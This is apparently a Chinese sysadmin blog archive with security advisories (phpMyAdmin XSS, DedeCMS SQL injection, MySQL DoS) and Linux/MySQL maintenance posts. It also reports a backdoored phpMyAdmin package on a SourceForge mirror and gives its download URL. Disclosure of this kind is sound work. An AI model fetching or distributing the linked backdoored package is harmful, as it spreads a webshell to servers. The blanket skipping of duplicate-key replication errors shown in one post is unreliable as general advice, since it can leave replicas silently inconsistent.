Skip to content

phpMyAdmin 3.5.x HTML注入漏洞(CVE-2012-5339)

PMASA-2012-6

Announcement-ID: PMASA-2012-6

Date: 2012-10-12

Summary

Multiple XSS due to unescaped HTML output in Trigger, Procedure and Event pages.

Description

When creating/modifying a trigger, event or procedure with a crafted name, it is possible to trigger an XSS. phpMyAdmin Trigger, Procedure和Event页面不正确转义HTML输出,使用特殊名创建/修改trigger, event或procedure时,可触发跨站脚本攻击,可获得敏感信息或劫持用户会话。 Severity

We consider these vulnerabilities to be non critical.

Mitigation factor

These XSS can only be triggered when a crafted value is entered by the user.

Affected Versions

Versions 3.5.x are affected.

Solution

Upgrade to phpMyAdmin 3.5.3 or newer or apply the patches listed below.

References

Thanks to Maxim Rupp for reporting an issue when creating an event.

Assigned CVE ids: CVE-2012-5339

CWE ids: CWE-661 CWE-79

http://sebug.net/vuldb/ssvid-60440 http://www.phpmyadmin.net/home_page/security/PMASA-2012-6.php

Posted in 安全通告.

Tagged with , .

rev="post-1559" No comments

By C1G 2012/10/17

mysql复制同步1062错误修复

Percona-Server-5.5.22-rel25.2 其中一台从库同步discuzx时出错,Slave_SQL_Running为no

show slave status;

lave_IO_State Waiting for master to send event Master_Host 192.168.0.99 Master_User xxx Master_Port 3306 Connect_Retry 60 Master_Log_File mysql-bin.000059 Read_Master_Log_Pos 63986019 Relay_Log_File C1g-relay-bin.000417 Relay_Log_Pos 48985722 Relay_Master_Log_File mysql-bin.000059 Slave_IO_Running Yes Slave_SQL_Running No Replicate_Do_DB discuzx Replicate_Ignore_DB Replicate_Do_Table Replicate_Ignore_Table discuzx.pre_common_admincp_session,discuzx.pre_common_session Replicate_Wild_Do_Table Replicate_Wild_Ignore_Table Last_Errno 1062 Last_Error Error ‘Duplicate entry ‘1503760-25’ for key ‘PRIMARY” on query. Default database: ‘discuzx’. Query: ‘INSERT INTO pre_forum_post SET `fid`=’456′ , `tid`=’1553760′ , `first`=’0′ , `author`=’xxx’ , `authorid`=’4018205′ , `subject`=” , `dateline`=’1349931502′ , `message`=’xxx’ , `useip`=’61.165.2.2′ , `invisible`=’0′ , `anonymous`=’0′ , `usesig`=’1′ , `htmlon`=’0′ , `bbcodeoff`=0 , `smileyoff`=’-1′ , `parseurloff`=0 , `attachment`=’0′ , `status`=’0′ , `pid`=’12202748” Skip_Counter 0 Exec_Master_Log_Pos 48985576 Relay_Log_Space 64152580 Until_Condition None Until_Log_File

先尝试修复表pre_forum_post,再删除1503760-25主键记录,start slave; 依然有很表错误

Last_Error Error ‘Duplicate entry ‘3064092’ for key ‘PRIMARY” on query. Default database: ‘discuzx’. Query: ‘INSERT INTO pre_common_member_action_log SET `uid`=’4818285′ , `action`=’1’ , `dateline`=’1349931502” Last_Error Error ‘Duplicate entry ‘2327049’ for key ‘PRIMARY” on query. Default database: ‘discuzx’. Query: ‘INSERT INTO pre_home_notification SET `uid`=’4047895′ , `type`=’post’ , `new`=’1′ , `authorid`=’4818285′ , `author`=’xxx’ , `note`=’xxx’ , `dateline`=’1349931502′ , `from_id`=’12002748′ , `from_idtype`=’quote’ , `from_num`=’1” last_Error Error ‘Duplicate entry ‘3409334’ for key ‘PRIMARY” on query. Default database: ‘discuzx’. Query: ‘INSERT INTO pre_common_credit_rule_log SET `uid`=’4082252′ , `rid`=’5′ , `fid`=’0′ , `total`=’1′ , `cyclenum`=’1′ , `dateline`=’1349931503′ , `extcredits2`=’-2”

尝试sql_slave_skip_counter无效

stop slave; set global sql_slave_skip_counter =1 ; start slave;

使用命令批量修复数据表 不停机 mysqlcheck -A -o -r -p 或停机用myisamchk

在my.cnf中忽略所有1062错误

slave-skip-errors = 1062

重启mysql

/opt/mysql/bin/mysql.server restart

会出现找不到Relay log日志的错误

Last_Errno 1594 Last_Error Relay log read failure: Could not parse relay log event entry. The possible reasons are: the master’s binary log is corrupted (you can check this by running ‘mysqlbinlog’ on the binary log), the slave’s relay log is corrupted (you can check this by running ‘mysqlbinlog’ on the relay log), a network problem, or a bug in the master’s or slave’s MySQL code. If you want to check the master’s binary log or slave’s relay log, you will be able to know their names by issuing ‘SHOW SLAVE STATUS’ on this slave.

show slave status;

Connect_Retry 60 Master_Log_File mysql-bin.000059 Read_Master_Log_Pos 89775799 Relay_Log_File C1g-relay-bin.000417 Relay_Log_Pos 49139383 Relay_Master_Log_File mysql-bin.000059 Slave_IO_Running Yes Slave_SQL_Running No Replicate_Do_DB discuzx Replicate_Ig Skip_Counter 1 Exec_Master_Log_Pos 49139237 Relay_Log_Space 89942788 Until_Condition None Until_Log_File Until_Log_Pos 0 Master_SSL_Allowed

记录下面两个参数,重新设定记录点

Relay_Master_Log_File mysql-bin.000059 Exec_Master_Log_Pos 49139237 stop slave; change master to Master_Log_File=’mysql-bin.000059′, Master_Log_Pos=49139237; start slave;

show slave status;

Slave_IO_Running Yes Slave_SQL_Running Yes

再观察其它从库和master的记录点,没有问题,修复成功




参考: http://www.cnblogs.com/niniwzw/archive/2010/02/04/1663685.html

Posted in Mysql.

Tagged with , .

rev="post-1555" 2 comments

By C1G 2012/10/11

dedecms(织梦) < 5.7 多个SQL注入漏洞

漏洞版本:

dedecms < 5.7 漏洞描述:

BUGTRAQ ID: 51211 CVE ID: CVE-2011-5200

DedeCms是免费的PHP网站内容管理系统。

DedeCMS 5.6存在多个SQL注入漏洞,通过id参数向 list.php、members.php、book.php传参,可允许远程攻击者利用这些漏洞控制应用、访问或修改数据、利用下层数据库内的其他漏洞。 < 参考 http://www.exploit-db.com/exploits/18292/ > 安全建议:

厂商补丁:

dedecms

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.dedecms.com/products/dedecms/

参考:http://sebug.net/vuldb/ssvid-60403

Posted in 安全通告.

Tagged with , .

rev="post-1552" No comments

By C1G 2012/09/26

sourceforge韩国节点被入侵,前段时间下载的phpmyadmin可能受影响

简要描述:

从微博上看到腾讯安全团队说sourceforge一些服务器被入侵,一些源码被植入后门,仔细研究了下,发现并非sourceforge被入侵,而是下面的韩国镜像节点提供商cdnetworks服务器存在问题

详细说明:

在sourceforge上下载源码时,会根据网络情况自动选择镜像节点下载,由于我国没有镜像服务器,所以会从最近的韩国的节点上下载,这次腾讯也发现有phpMyadmin源码被植入了后门的情况,我们经过分析发现其他的节点均不存在问题,只有韩国的cdnetworks提供的某些镜像中才存在问题

漏洞证明: 自动选择的韩国节点上下载phpMyadmin源码会发现存在后门/server_sync.php 里包含一句话木马。 http://cdnetworks-kr-1.dl.sourceforge.net/project/phpmyadmin/phpMyAdmin/3.5.2.2/phpMyAdmin-3.5.2.2-all-languages.zip

通过和国网中心的包比对了下,确实多了个server_sync.php文件。

参考:http://www.wooyun.org/bugs/wooyun-2010-012705#0-tsina-1-27413-397232819ff9a47a7b7e80a40613cfe1

Posted in 安全通告.

Tagged with , .

rev="post-1548" No comments

By C1G 2012/09/25

Oracle MySQL 5.1.x 拒绝服务漏洞(CVE-2012-2749)

发布时间: 2012-08-21 (GMT+0800) 漏洞版本:

MySQL 5.1.x 漏洞描述:

BUGTRAQ ID: 55120 CVE ID: CVE-2012-2749

MySQL是一个小型关系型数据库管理系统,开发者为瑞典MySQLAB公司,在2008年1月16号被Sun公司收购。

MySQL 5.1.63之前的5.1.x版本和5.5.24之前的5.5.x版本在实现上存在安全漏洞,可允许已验证用户通过错误计算和排序索引造成拒绝服务,mysqld崩溃。 < 参考 https://bugzilla.redhat.com/show_bug.cgi?id=833737 http://dev.mysql.com/doc/refman/5.1/en/news-5-1-63.html > 安全建议:

厂商补丁:

MySQL AB

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.mysql.com/

参考:http://sebug.net/vuldb/ssvid-60344

Posted in 安全通告.

Tagged with , .

rev="post-1545" No comments

By C1G 2012/08/23

phpMyAdmin 3.4.x 多个HTML注入漏洞

PMASA-2012-4

Announcement-ID: PMASA-2012-4

Date: 2012-08-16

Summary phpMyAdmin 3.4.11.1之前版本、3.5.2.2 之前版本在实现上存在多个HTML注入漏洞,攻击者可利用这些漏洞注入HTML和JS代码到受影响站点,导致窃取身份验证凭证并控制站点外观。

Multiple XSS in Table operations, Database structure, Trigger and Visualize GIS data pages.

Description

Using a crafted table name, it was possible to produce a XSS : 1) On the Database Structure page, creating a new table with a crafted name 2) On the Database Structure page, using the Empty and Drop links of the crafted table name 3) On the Table Operations page of a crafted table, using the ‘Empty the table (TRUNCATE)’ and ‘Delete the table (DROP)’ links 4) On the Triggers page of a database containing tables with a crafted name, when opening the ‘Add Trigger’ popup 5) When creating a trigger for a table with a crafted name, with an invalid definition. Having crafted data in a database table, it was possible to produce a XSS : 6) When visualizing GIS data, having a crafted label name.

Severity

We consider these vulnerabilities to be non critical.

Mitigation factor

These XSS can only be triggered when a table with a crafted name is already present, or if crafted data is already stored in a database table.

Affected Versions

Versions 3.4.x are affected, for issues #1 and #2. Versions 3.5.x are affected, for all issues.

Solution

Upgrade to phpMyAdmin 3.4.11.1 or 3.5.2.2 or newer or apply the patches listed below. http://www.phpmyadmin.net/home_page/security/PMASA-2012-4.php

下载最新phpmyadmin

Posted in 安全通告.

Tagged with , .

rev="post-1543" No comments

By C1G 2012/08/22

linux下为新硬盘创建lvm分区

DELL R410本来有两块146G的硬盘,再新增一块146G硬盘 现在硬盘便宜了,天猫价650,另需硬盘托架一个70大洋.

开启硬件检测后重启服务器

chkconfig haldaemon on chkconfig messagebus on #centos6 没有kudzu服务改用udev chkconfig kudzu on

认出了新硬盘/dev/sdc

fdisk -l

Disk /dev/sda: 146.8 GB, 146815733760 bytes 255 heads, 63 sectors/track, 17849 cylinders Units = cylinders of 16065 * 512 = 8225280 bytes Device Boot Start End Blocks Id System /dev/sda1 * 1 25 200781 83 Linux /dev/sda2 26 1069 8385930 82 Linux swap / Solaris /dev/sda3 1070 17849 134785350 8e Linux LVM Disk /dev/sdb: 146.8 GB, 146815733760 bytes 255 heads, 63 sectors/track, 17849 cylinders Units = cylinders of 16065 * 512 = 8225280 bytes Device Boot Start End Blocks Id System /dev/sdb1 * 1 17849 143372061 8e Linux LVM Disk /dev/sdc: 146.8 GB, 146815737856 bytes 255 heads, 63 sectors/track, 17849 cylinders Units = cylinders of 16065 * 512 = 8225280 bytes Disk /dev/sdc doesn’t contain a valid partition table

查看现有pv

pvdisplay

— Physical volume — PV Name /dev/sdb1 VG Name VolGroup01 PV Size 136.73 GB / not usable 11.78 MB Allocatable yes (but full) PE Size (KByte) 32768 Total PE 4375 Free PE 0 Allocated PE 4375 PV UUID p2QSKt-hLuG-xGF5-Cj8t-9IxX-cKCf-hP7hIu — Physical volume — PV Name /dev/sda3 VG Name VolGroup00 PV Size 128.54 GB / not usable 10.32 MB Allocatable yes (but full) PE Size (KByte) 32768 Total PE 4113 Free PE 0 Allocated PE 4113 PV UUID wdCg83-8jEM-XQtP-gmuX-lYor-IpWn-Hve2mr

对新硬盘分区,lvm的id为8e

fdisk /dev/sdc

Device contains neither a valid DOS partition table, nor Sun, SGI or OSF disklabel Building a new DOS disklabel. Changes will remain in memory only, until you decide to write them. After that, of course, the previous content won’t be recoverable. The number of cylinders for this disk is set to 17849. There is nothing wrong with that, but this is larger than 1024, and could in certain setups cause problems with: 1) software that runs at boot time (e.g., old versions of LILO) 2) booting and partitioning software from other OSs (e.g., DOS FDISK, OS/2 FDISK) Warning: invalid flag 0x0000 of partition table 4 will be corrected by w(rite) Command (m for help): p Disk /dev/sdc: 146.8 GB, 146815737856 bytes 255 heads, 63 sectors/track, 17849 cylinders Units = cylinders of 16065 * 512 = 8225280 bytes Device Boot Start End Blocks Id System Command (m for help): n Command action e extended p primary partition (1-4) p Partition number (1-4): 1 First cylinder (1-17849, default 1): Using default value 1 Last cylinder or +size or +sizeM or +sizeK (1-17849, default 17849): Using default value 17849 Command (m for help): p Disk /dev/sdc: 146.8 GB, 146815737856 bytes 255 heads, 63 sectors/track, 17849 cylinders Units = cylinders of 16065 * 512 = 8225280 bytes Device Boot Start End Blocks Id System /dev/sdc1 1 17849 143372061 83 Linux Command (m for help): t Selected partition 1 Hex code (type L to list codes): 8e Changed system type of partition 1 to 8e (Linux LVM) Command (m for help): p Disk /dev/sdc: 146.8 GB, 146815737856 bytes 255 heads, 63 sectors/track, 17849 cylinders Units = cylinders of 16065 * 512 = 8225280 bytes Device Boot Start End Blocks Id System /dev/sdc1 1 17849 143372061 8e Linux LVM Command (m for help): w

创建pv

# pvcreate /dev/sdc1 Physical volume “/dev/sdc1” successfully created # pvdisplay — Physical volume — PV Name /dev/sdb1 VG Name VolGroup01 PV Size 136.73 GB / not usable 11.78 MB Allocatable yes (but full) PE Size (KByte) 32768 Total PE 4375 Free PE 0 Allocated PE 4375 PV UUID p2QSKt-hLuG-xGF5-Cj8t-9IxX-cKCf-hP7hIu — Physical volume — PV Name /dev/sda3 VG Name VolGroup00 PV Size 128.54 GB / not usable 10.32 MB Allocatable yes (but full) PE Size (KByte) 32768 Total PE 4113 Free PE 0 Allocated PE 4113 PV UUID wdCg83-8jEM-XQtP-gmuX-lYor-IpWn-Hve2mr “/dev/sdc1” is a new physical volume of “136.73 GB” — NEW Physical volume — PV Name /dev/sdc1 VG Name PV Size 136.73 GB Allocatable NO PE Size (KByte) 0 Total PE 0 Free PE 0 Allocated PE 0 PV UUID rifdUK-ACXa-hGlM-L5iD-UkZ5-p4It-pshfwd

创建vg

# vgcreate VolGroup02 /dev/sdc1 Volume group “VolGroup02” successfully created # vgdisplay — Volume group — VG Name VolGroup02 System ID Format lvm2 Metadata Areas 1 Metadata Sequence No 1 VG Access read/write VG Status resizable MAX LV 0 Cur LV 0 Open LV 0 Max PV 0 Cur PV 1 Act PV 1 VG Size 136.73 GB PE Size 4.00 MB Total PE 35002 Alloc PE / Size 0 / 0 Free PE / Size 35002 / 136.73 GB VG UUID YLvkVA-OZQJ-p3yZ-5fEg-4xmH-dXMF-6ZcqTY — Volume group — VG Name VolGroup01 System ID Format lvm2 Metadata Areas 1 Metadata Sequence No 2 VG Access read/write VG Status resizable MAX LV 0 Cur LV 1 Open LV 1 Max PV 0 Cur PV 1 Act PV 1 VG Size 136.72 GB PE Size 32.00 MB Total PE 4375 Alloc PE / Size 4375 / 136.72 GB Free PE / Size 0 / 0 VG UUID bTRPY7-sETF-7yrw-8Iaa-jgMp-msLb-VFf9Pv — Volume group — VG Name VolGroup00 System ID Format lvm2 Metadata Areas 1 Metadata Sequence No 3 VG Access read/write VG Status resizable MAX LV 0 Cur LV 2 Open LV 2 Max PV 0 Cur PV 1 Act PV 1 VG Size 128.53 GB PE Size 32.00 MB Total PE 4113 Alloc PE / Size 4113 / 128.53 GB Free PE / Size 0 / 0 VG UUID dZu73K-djmf-Qqes-7Bl2-NcGr-12cx-2ygDPt

创建逻辑卷,分配全部空间

# lvcreate -l 100%FREE -n /dev/VolGroup02/LogVol00 VolGroup02 Logical volume “LogVol00” created # lvdisplay — Logical volume — LV Name /dev/VolGroup02/LogVol00 VG Name VolGroup02 LV UUID TThlLG-BUNw-smr9-Cv1d-cv8D-1V8i-cB0Hfa LV Write Access read/write LV Status available # open 0 LV Size 136.73 GB Current LE 35002 Segments 1 Allocation inherit Read ahead sectors auto – currently set to 256 Block device 253:3 — Logical volume — LV Name /dev/VolGroup01/LogVol00 VG Name VolGroup01 LV UUID 0JbGWl-ivcx-g4WL-JHY7-RcXc-hEM5-V3htC1 LV Write Access read/write LV Status available # open 1 LV Size 136.72 GB Current LE 4375 Segments 1 Allocation inherit Read ahead sectors auto – currently set to 256 Block device 253:2 — Logical volume — LV Name /dev/VolGroup00/LogVol01 VG Name VolGroup00 LV UUID cZ3Vnw-PMIx-LUNQ-N53R-etKc-s1BS-AmQE82 LV Write Access read/write LV Status available # open 1 LV Size 118.53 GB Current LE 3793 Segments 1 Allocation inherit Read ahead sectors auto – currently set to 256 Block device 253:0 — Logical volume — LV Name /dev/VolGroup00/LogVol00 VG Name VolGroup00 LV UUID R5fS7y-9649-kyZi-VFmn-24lh-ju2w-Uk7TzY LV Write Access read/write LV Status available # open 1 LV Size 10.00 GB Current LE 320 Segments 1 Allocation inherit Read ahead sectors auto – currently set to 256 Block device 253:1

格式化分区 linux的硬盘分区程序会自动为root或指定的用户保留一定的磁盘空间默认是5%,利用mke2fs的-m reserved-percentage选项可以调整这个设置来获得更多的磁盘空间且不影响性能。而在创建了文件系统之后,用户可以用tune2fs来修 改这个设置比如tune2fs -m 1 /dev/sdc1 可以将保留的空间设置为1% 1792102 blocks (5.00%) reserved for the super user

# mkfs -t ext3 /dev/VolGroup02/LogVol00 mke2fs 1.39 (29-May-2006) Filesystem label= OS type: Linux Block size=4096 (log=2) Fragment size=4096 (log=2) 17924096 inodes, 35842048 blocks 1792102 blocks (5.00%) reserved for the super user First data block=0 Maximum filesystem blocks=4294967296 1094 block groups 32768 blocks per group, 32768 fragments per group 16384 inodes per group Superblock backups stored on blocks: 32768, 98304, 163840, 229376, 294912, 819200, 884736, 1605632, 2654208, 4096000, 7962624, 11239424, 20480000, 23887872 Writing inode tables: done Creating journal (32768 blocks): done Writing superblocks and filesystem accounting information: done This filesystem will be automatically checked every 23 mounts or 180 days, whichever comes first. Use tune2fs -c or -i to override.

挂载分区

# mkdir /data # mount /dev/VolGroup02/LogVol00 /data # df -h 文件系统 容量 已用 可用 已用% 挂载点 /dev/mapper/VolGroup00-LogVol01 115G 12G 98G 11% / /dev/mapper/VolGroup00-LogVol00 9.7G 152M 9.1G 2% /tmp /dev/mapper/VolGroup01-LogVol00 133G 35G 91G 28% /opt /dev/sda1 190M 13M 168M 7% /boot tmpfs 7.9G 92K 7.9G 1% /dev/shm /dev/mapper/VolGroup02-LogVol00 135G 188M 128G 1% /data

启动后自动挂载

vi /etc/fstab /dev/VolGroup02/LogVol00 /data ext3 defaults 1 2

测试写入

#cd /data #touch testfile

===================== 2012-12-14更新 释放Linux系统预留的硬盘空间,增加-m 1 可以增加空间

mkfs -t ext3 -m 1 /dev/VolGroup02/LogVol00

Posted in linux 维护优化.

Tagged with , , .

rev="post-1536" No comments

By C1G 2012/07/30

如何禁止npre连接日志输出到/var/log/message中

nrpe 会在messages中留下大量连接记录,影响日志阅读 我的nrpe以daemon方式运行

/opt/nagios/bin/nrpe -c /opt/nagios/etc/nrpe.cfg -d

tail /var/log/messages

Jul 19 14:04:22 C1gstudio sshd[20749]: Connection closed by 122.111.222.111 [preauth] Jul 19 14:09:22 C1gstudio sshd[21056]: Connection closed by 122.111.222.111 [preauth]

查看ssh当前的日志记录方式默认为 auth.info cat /etc/ssh/sshd_config

# Logging # obsoletes QuietMode and FascistLogging #SyslogFacility AUTH #LogLevel INFO

修改ssh日志输出 vi /etc/syslog.conf

*.info;mail.none;authpriv.none;cron.none; /var/log/messages #在尾部添加!auth.info 不再将ssh记录输出到/var/log/messages *.info;mail.none;authpriv.none;cron.none;auth.!=info /var/log/messages #新增一行,将ssh日志输出到/var/log/sshd auth.* /var/log/sshd

重新载入syslog服务 /etc/init.d/syslog reload

查看修改后效果 tail -f /var/log/messages /var/log/sshd

ssh的连接日志会保存在/var/log/sshd中,nrpe本身的启动等日志还是在/var/log/messages中

2012-08-01更新============= /etc/syslog.conf中应为;auth.!=info不是;!auth.info 可以用logger测试 logger -p auth.info “hello”

Posted in Nagios, 技术, 日志.

Tagged with , , .

rev="post-1530" No comments

By C1G 2012/07/19

linux系统日志没有轮询引起入侵误报

logwatch报告中显示昨天有SSH账号登录并执行了一些维护命令,想想真奇怪这黑客具然上来维护系统.

查看了下最近并没有登录记录 tail -n100 /var/log/secure

注意到/var/log目录下日志文件很大,并且没有.x的轮询文件 ll /var/log

搜索日期确实有登录记录,原来日志中没有记录年份,因为日志没轮询把去年的登录记录当成是昨天的了 cat /var/log/secure |grep ‘Jul 16’

手动运行下logrotate /etc/cron.daily/logrotate 提示没有uucp这个用户,执行失败(uucp用户之前手功删了)

删除uucp日志后就能正常运行 rm /etc/logrotate.d/uucp

Posted in linux 维护优化, 日志.

Tagged with , .

rev="post-1528" No comments

By C1G 2012/07/17

如何快速解决linux只读系统 Read-only file system

io频繁的系统可能经常会出现分区不可写的情况,用fsck修复

1.查看有多少分区入格式 cat /etc/fstab /dev/VolGroup00/LogVol03 /opt ext3 defaults 1 2

2.在每个分区下测试能否写入 cd /opt touch x touch: cannot touch `x’: Read-only file system

3.手动修复/opt分区 fsck前分区要先卸载 umount /opt 遇到系统忙可以使用fuser fuser -mk /opt

以ext3格式修复 fsck -t ext3 /opt

再重新挂载分区就可以写入了 mount /opt

ps: 不修复直接以读写方式重新挂载分区 mount -o rw,remount /opt

系统重启时会自动执行fsck的操作

建议/var 目录单独分区

Posted in linux 维护优化.

Tagged with , .

rev="post-1526" No comments

By C1G 2012/07/17